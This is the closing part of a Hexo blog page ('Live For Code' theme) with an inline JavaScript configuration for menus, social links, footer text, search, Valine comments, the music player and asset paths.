                    "很抱歉，您访问的页面不存在！",
                
                    "可能是输入地址有误或该地址已变更。",
                
            ],
            buttons : [
                
                    {
                        icon  : "icon-home",
                        text  : "返回首页",
                        href  : "/",
                        class : ""
                    },
                
            ]
        },

        MenuNotice : {
            enable : true,
            notice : "简单地活着，肆意而又精彩！",
            speed  : 20
        },
        MenuList : [
            
                {
                    name   : "首页",
                    icon   : "icon-home-fill",
                    href   : "/",
                    type   : "index",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "分类",
                    icon   : "icon-folder-fill",
                    href   : "/category",
                    type   : "category",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "标签",
                    icon   : "icon-discount-fill",
                    href   : "/tag",
                    type   : "tag",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "归档",
                    icon   : "icon-calendar-fill",
                    href   : "/archive",
                    type   : "archive",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "赞赏",
                    icon   : "icon-heart-fill",
                    href   : "/donate",
                    type   : "donate",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "关于",
                    icon   : "icon-about-fill",
                    href   : "/about",
                    type   : "about",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "订阅",
                    icon   : "icon-rss",
                    href   : "/atom.xml",
                    type   : "",
                    class  : "",
                    target : "_blank"
                },
            
                {
                    name   : "搜索",
                    icon   : "icon-search-menu",
                    href   : "javascript:;",
                    type   : "",
                    class  : "search",
                    target : "_self"
                },
            
                {
                    name   : "留言板",
                    icon   : "icon-comments-fill",
                    href   : "/comment",
                    type   : "comment",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "友情链接",
                    icon   : "icon-link",
                    href   : "/friend",
                    type   : "friend",
                    class  : "",
                    target : "_self"
                },
            
        ],
        MenuLink : [
            
                
                    {
                        name   : "知乎",
                        icon   : "icon-zhihu",
                        href   : "https://zhihu.com/people/worstone-29",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "微博",
                        icon   : "icon-weibo",
                        href   : "https://weibo.com/u/5749847477",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "QQ",
                        icon   : "icon-qq",
                        href   : "javascript:;",
                        class  : "image",
                        target : "_self",
                        image  : "/image/sidebar/qq.png"
                    },
                
                    {
                        name   : "微信",
                        icon   : "icon-wechat",
                        href   : "javascript:;",
                        class  : "",
                        target : "_self",
                        image  : ""
                    },
                
                    {
                        name   : "GitHub",
                        icon   : "icon-github",
                        href   : "https://github.com/first19326",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
            
        ],

        FooterStyle : 2,
        BottomText  : "<div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2022 WorstOne. All Rights Reserved.</div>",

        ConsoleList : [
            
                
                    [
                        
                            
                                "Based on cnblogs theme SimpleMemory.",
                            
                                "",
                            
                        
                    ],
                
                    [
                        
                            
                                "SimpleMemory Author:",
                            
                                "BNDong",
                            
                        
                    ],
                
                    [
                        
                            
                                "Theme:",
                            
                                "LiveForCode",
                            
                        
                    ],
                
            
        ],

        FontIconExtend : "",

        Donate : {
            paypal  : "",
            bitcoin : "",
            alipay  : "/image/donate/alipay.png",
            wechat  : "/image/donate/wechat.png"
        },

        Search : {
            applicationID : "010C3EANT8",
            apiKey        : "c7abab9f11b79102b9aff7fe6d41447d",
            indexName     : "Notes",
            hits          : {
                page : 10
            },
            labels        : {
                placeholder : "搜索",
                empty       : "未发现与 「${query}」 相关的内容",
                stats       : "${hits} 条相关条目，使用了 ${time} 毫秒",
            }
        }, 

        Valine : {
            switch         : true,
            el             : ".comments-content",
            appId          : "srhKtvWPQTWYKh3qX8G8M7v0-gzGzoHsz",
            appKey         : "8uVSP1q6UlALVC5igYfIfv2h",
            serverURLs     : "",
            placeholder    : "你是我一生只会遇见一次的惊喜...",
            avatar         : "mm",
            meta           : "nick,mail,link",
            requiredFields : "nick,mail",
            pageSize       : 5,
            lang           : "zh-cn",
            visitor        : true,
            enableQQ       : true
        },

        Tocbot : {
            switch                : true,
            tocSelector           : ".toc",
            contentSelector       : ".article-body",
            headingSelector       : "h1, h2, h3, h4, h5",
            headingsOffset        : 0,
            scrollSmooth          : true,
            scrollSmoothOffset    : -5,
            positionFixedSelector : ".toc",
            positionFixedClass    : "toc-fixed",
            fixedSidebarOffset    : "",
        },

        Require : {
            baseUrl     : "/js/",
            waitSeconds : 100
        },

        Music : {
            type : "Meting"
        },
        APlayer : {
            container : ".aplayer",
            fixed     : true,
            autoplay  : false,
            loop      : "all",
            order     : "random",
            preload   : "auto",
            volume    : 0.67,
            mutex     : true,
            lrcType   : 3,
            audio     : [
                
                    {
                        name   : "Endless Tears",
                        artist : "CLIFF EDGE",
                        cover  : "/music/cover/Endless Tears.jpg",
                        url    : "/music/song/Endless Tears.mp3",
                        lrc    : "/music/lrc/Endless Tears.lrc"
                    },
                
            ]
        },
        Meting : {
            id       : "3778678", 
            lrcshow  : false, 
            server   : "netease", 
            type     : "playlist", 
            fixed    : true, 
            autoplay : false, 
            loop     : "all", 
            order    : "random", 
            preload  : "auto", 
            volume   : 0.67, 
            mutex    : true
        },

        Mouse : {
            enable  : true,
            options : {
                size  : 6,
                sizeF : 24
            }
        },

        LazyLoad : {
            default : "/image/website/lazyload.svg"
        },
  
        Style : {
            aplayer          : "/css/APlayer.css",
            archive          : "/css/archive.css",
            base             : "/css/base.css",
            clipboard        : "/css/clipboard.css",
            code             : "/css/code.css",
            donate           : "/css/donate.css",
            fancybox         : "/css/jquery.fancybox.css",
            footer           : "/css/footer.css",
            iconfont         : "/iconfont/iconfont.css",
            index            : "/css/index.css",
            menuBubble       : "/css/menu-bubble.css",
            mouse            : "/css/mouse.css",
            page             : "/css/page.css",
            post             : "/css/post.css",
            search           : "/css/search.css",
            tocbot           : "/css/tocbot.css",
            valine           : "/css/valine.css"
        },

        Script: {
            aplayer          : "/js/APlayer.min.js",
            config           : "/js/require.config.js",
            index            : "/js/index.js",
            instantSearch    : "/js/instantsearch.min.js",
            iscroll          : "/js/iscroll.js",
            jQuery           : "/js/jquery-3.4.1.min.js",
            loading          : "/js/loading.js",
            meting           : "/js/Meting.min.js",
            require          : "/js/require.min.js"
        },

        Font: {
            LongCang    : "/font/LongCang.css",
            Monda       : "/font/Monda.css",
            NotoSansSC  : "/font/NotoSansSC.css",
            NotoSerifSC : "/font/NotoSerifSC.css",
            Playball    : "/font/Playball.css",
            PTMono      : "/font/PTMono.css",
            Roboto      : "/font/Roboto.css",
            RobotoSlab  : "/font/RobotoSlab.css",
            Rosario     : "/font/Rosario.css",
            UbuntuMono  : "/font/UbuntuMono.css"
        },

        Suffix : {
            about : "简单地活着, 肆意又精彩."
        },
            
        Theme : {
            url  : "https://github.com/first19326/Hexo-LiveForCode",
            name : "Hexo - Live For Code"
        }  
    };
</script>
    <script type="text/javascript" src="/js/index.js"></script>
</body>
</html>